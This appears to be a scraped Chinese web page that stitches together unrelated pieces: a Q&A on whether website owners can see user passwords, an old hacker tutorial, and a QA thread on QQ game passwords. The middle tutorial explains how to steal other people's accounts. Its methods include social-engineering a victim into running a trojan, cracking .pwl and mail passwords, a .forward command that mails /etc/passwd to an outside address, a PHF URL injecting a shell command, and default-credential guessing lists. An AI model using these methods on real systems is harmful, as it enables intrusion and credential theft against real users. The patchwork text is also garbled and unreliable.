网站的建立者可以看到用户的帐号和密码吗?
很多人都有这样一种习惯,自己在同类型的网站上喜欢用同样的用户名和密码.这种习惯甚至沿用到了网银如果有一人动机不良建立一个网站专门用来广撒网收集用户的ID和密码信息来变相盗取用户的个人信息怎么办?先不说法律问题,只讨论这种事的可能性以及防范措施.听说过两种说法,一个是站长只要想,可以随便获得用户的ID和密码.另一种说法是用户的ID和密码会随机生成乱码,就算是后台管理的人也无法看到.
按时间排序
泻药。。对于题主的防范密码被窃后连带到网银这个问题，我们普通用户能做的只有按不同安全级别使用多个不同的密码来防范，比如银行类的高安全级别可以设置一类，常用的如知乎等可以设置一类，临时注册只是玩玩的可以设置简单的密码就好。在比较大型的企业或是管理严谨的公司，代码的编写者和DB的负责人不是一个人或部门在管理，对于只有加密算法或是只有加密后的数据这样的情况来说，是无法进行密码反推的，即使是有算法和加密的数据，原则上也是无法反推，这个题主完全可以放心。对于题主所说的建个不良网站来钓鱼收集用户账号密码的情况，我想这个建站的人也不会给自己设置这么多障碍让自己头疼了，肯定是使用明文密码进行保存的。所以说，高级别密码还是不要随意用来使用注册的好。
谢邀,个人所见。网站的建立者拥有绝对的权限，暂时不说独立开发的程序。市面上流行的程序例如：phpwind.DZ.Wordpress.等等..用户的信息都会写入数据库,这类程序好像还没有保护用户隐私的一些措施。用户信息不会是乱码,但我接触的wordpress会把用户密码MD5加密（其他信息均为可读信息）而个人站长也没有这种防范意识。如果是站长故意想要获取用户信息的话.我想轻而易举。不过现在暂时没有这种案例发生。也希望大家能有一点防范意识,不要使用同样的密码。每个周期都修改密码
那要看站长是如何保存用户密码的，如果加密了就不存在泄露，有些网站存在恶意明文保存用户密码，这就危险了，而且之前也被爆料出不少大网站都存在明文保存用户密码的行为。
很大一部分是 关于个人道德还有网页后台源码的编写吧
已有帐号？
无法登录？
社交帐号登录如何得到别人的上网帐号和密码
&&&&&&&&&&&&&&&&&&&&&&&&
如何得到别人的上网帐号和密码
如何得到别人的上网帐号和密码，我在这里介绍几种弱智方法。
方案一：利用特洛伊木马得到帐号。必备工具：NTESPY、PWLVIEW。
优点：只要对方运行了程序就有80%的成功率，而且不需要任何网络入侵知识，只要能熟悉的操作上面两个软件即可。NETSPY是全中文软件，一看就会。而PWLVIEW又是弱智操作只要在DOS下输入PWLVIEW然后按回车即可。成功率高，操作简单而且用不了多长时间是它最大的优点，只是......
缺点：只有一个，那就是如何让对方乖乖的运行你的程序。
提示：先问清你的目标和你是不是在一个城市。
实战演戏：一天，我在X海聊天室里寻找目标，遇见了同在北京的色鹅丢丢。我上前打招呼：丢丢好呀。丢丢说：你好呀。我又说：XXXXXXX（客套话，先和他拉关系）对了，我拿到了一个新程序，要不要看看？丢丢说：好呀，寄给我吧。
哈哈，鱼上钩了！先把诱饵程序改个名，如改成readme之类的东东，然后和一些不相干的东西发过去，然后你让他先运行README。在这插一句，有一位大侠使用此法时，竟然把控制端程序和NETSPY的说明文件一起发了过去，真搞不懂他怎么想的。我对他说，你先运行README，是中文说明。丢丢说：好...咦，怎么没反映呀？(YEAH!)我又说：那你直接运行软件吧。丢丢说：好吧...不错...我说：明天见...开始干活，连上他的机子后，现在C盘里找到了WIN95的目录WINDOWS。也有可能是WIN95或WIN98，进入后查找*.pwl,然后把所有后缀名为PWL的文件都抓过来，放在你的工具PWLVIEW的子目录里。在DOS窗口下输入PWLVIEW然后敲回车，丢丢的上网帐号和密码就都显示出来了。而且以后如果他上网，NETSPY就会通知你，他就再也逃不出你的手掌心了。就算是他换了密码，你也能在2分钟内再把他搞定。
忠告：你用他的帐号上网后第一件事就是先去查看他的上网时间。分析一下他一般几点上网以避免撞车。
方案二：利用ISP的疏忽做文章举。例用工具：EMAILCRK或网络刺客
优点：没什么优点
缺点：要具体情况具体对待，太麻烦
提示：平时多多留神。
譬如，某个ISP给你开好了帐号，然后又画蛇添足的给你一个邮箱，地址是：你的帐号@xxx.net
密码和你的上网密码一样。也就是说，只要你能敲开邮箱的密码就一切OK了。
运行EMAILCRK或网络刺客，套上字典后就等着。一般没有XX个小时搞不定，不成功的可能性很大，而且破解时还必须要上网。你的机子要是快可以开上三四个窗口，套上不同的字典一起破
方案三：侵入邮局主机然后把PASS档抓回来，然后用JOHN或JACK套上字典开始破。
优点：一次可以破出好多帐号，而且如果运气好还能拿到ROOT，这个主机就要归你控制了。而且破解时不用上网，可以好几台机子一起破。
缺点：对于初学者有一定困难，尤其是只想拿一个上网帐号这样做恐怕会得不偿失。而且被发现的可能性很大，情节严重且性质恶劣，一定要慎重对待。
由于介绍此类的教学文章比较多，我就不班门弄斧了。&
哈哈，我来说说最简单的入侵方法。其实入侵大体的原理相同，主要是利用系统的漏洞（BUG）来做文章。
只不过有的网站漏洞难找有的好找而已。一个好的黑客，就是要能很快的发现漏洞并加以利用。下面我给大家举一个小栗子。
有一天，我去XX热线申请主页，发现那里采用的是机器自动回信，信的大概格式如下：
------------------------------
XXX，你好（XX是你在表格上填的名字）
你在XX热线的主页空间已开通
帐户名：XXX 密码：11
-----------XX热线
电话：XXXX-XXXXXXXX
------------------------------
好了，由于是机器回信，所以那里所有人的初始密码都是11，而且该热线要更改密码要TELNET到邮局主机去改，有许多网友并没有接触过如何T主机，所以他们使用的还是初始密码11。
开始干活了，打开FTP软件，输入XX热线的IP，密码11，然后挨个输入帐户名。帐户名可去XX热线的主页空间列表里查看，先试试AAAA，。。。没成功，再换一个，AABB。。。还是不行。哈哈，这个用户名短，没准能行。输入AA。。。进去了。寄下用户名然后继续试，ABC。。。又成功了，看来没改密码的人很多呀。试几个就行了，现在，你已经拥有这些帐户的控制权了。
上面的这个栗子很简单，一般象这么大的漏很难找。要侵入一个稍微象点话的站台就要耗费你大量的时间和金钱，而且还未必能成功。即使成功了，你不改它实在无趣，改了恐怕会步马X的后尘。此人侵入贵阳的主机并把界面换成了一张淫秽图片。害的自己吃饭不用花钱了。所以我在这里劝大家一句，把这方面的精力放到全心全意为人民服务上去。实在不行就去聊天室，看谁不听话就炸他，同样很过瘾的！
&&&&&&&&&&&&&&&&&&&&&&&&&&
如何获得第一个帐号
我们这种水平不高的黑客入侵都是先得到系统的一个有效帐号,进入后再利用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是利用系统漏洞还是得到SHADOW都是有一定规律可寻的,通常你到一些黑客站点找到对应系统相应版本的EXPLOIT编译后执行就行了.我感觉最困难的是获得第一个有效的帐号,有时侯费尽力气也得不到,后来总算是积累了一些经验,想写出来和大家交流一下,希望能抛砖引玉,请高手们把更好的方法告诉我.
确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,帐号用ANONYMOUS或是FTP,密码用一个EMAIL帐号(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统帐号,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通帐号放进去,这就是很重要的信息,虽然只有帐号没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x，做一个.foward文件传上去，在UNIX下的命令应该是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后给匿名用户写一封信，它会把PASSWD发给你。
如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些帐号,有的网页上甚至列出了EMAIL通讯录,这对黑客来讲就是无价之宝.把这些帐号记下来,非常有用.
以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://攻击目标/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-&&
还可以利用目标的FINGER功能来积累帐号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了!
很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的帐号,例如:
帐号　　　　 密码
----------- ----------------
root　　　　root
sys　　　 　sys/system/bin
bin　　　　 sys/bin
mountfsys　 mountfsys
adm　　　　 adm
uucp　　　　uucp
nuucp　　　 anon
anon　　　　anon
user　　　　user
games　　　 games
install　　 install
reboot　　　给 "command login" 用的
demo　　　　demo
umountfsys　umountfsys
sync　　　　 sync
admin　　　 admin
guest　　　 guest
daemon　　　daemon
________________________________________________________________
有些管理员忘记把他们改掉,那你就发财了!
另外还有一些习惯性帐号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试.
只有帐号还不能进入系统,但有了帐号搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道帐号的那你应该会发现该用户的许多信息,例如:
xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh
qingyuan:x:275:50::/usr/qingyuan:/bin/sh
hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh
smlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh
kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh
brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh
tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh
............
这是一部分PASSWD,从这儿我们可以得到七个帐号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的.
如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜">如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜.
当然最可能的密码还是帐号本身和一些帐号的变形,如帐号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的.
如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好.
最后实在不行还有一种比较卑劣的手段，就是给该网站的网管写封信，想办法骗他执行特洛伊木马，然后再.......算了,不说了.
你可能发现以上这些方法都不能百分之百的成功,或者说成功率是比较低的,因为我也不知道更好的方法.但我感到一定有一种更好的方法,希望有高手见到此文能告诉我.我的EMAIL:
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&如何让自己的QQ游戏账号和QQ的密码不一样_百度知道
如何让自己的QQ游戏账号和QQ的密码不一样
怎么换密码让游戏密码和QQ密码不一样
我有更好的答案
专业回答，符号一起！！~~~大小写字母，数字，最与众不同，请勿模仿，谢谢采纳
这个无法改变。。。 只有TX出新的系统才能将游戏和QQ密码分开
只有人物密码了没别的`
其他类似问题
为您推荐：
qq游戏的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁您的举报已经提交成功，我们将尽快处理，谢谢！
如果是密码忘记，还有找回的可能，你可以根据你填写的资料，还有发送身份证复印件，可能找回．
但是如果是帐号密码都忘记了．就很难找回了．不过你也可以按照上面的方法...
去你申请时候的邮箱看看，如果没删的话上面有个激活邮件，那里面有，如果删了的话去邮箱的回收站找找，垃圾邮件里面也别放过。。。。
大家还关注
(window.slotbydup=window.slotbydup || []).push({
id: '2081942',
container: s,
size: '1000,60',
display: 'inlay-fix'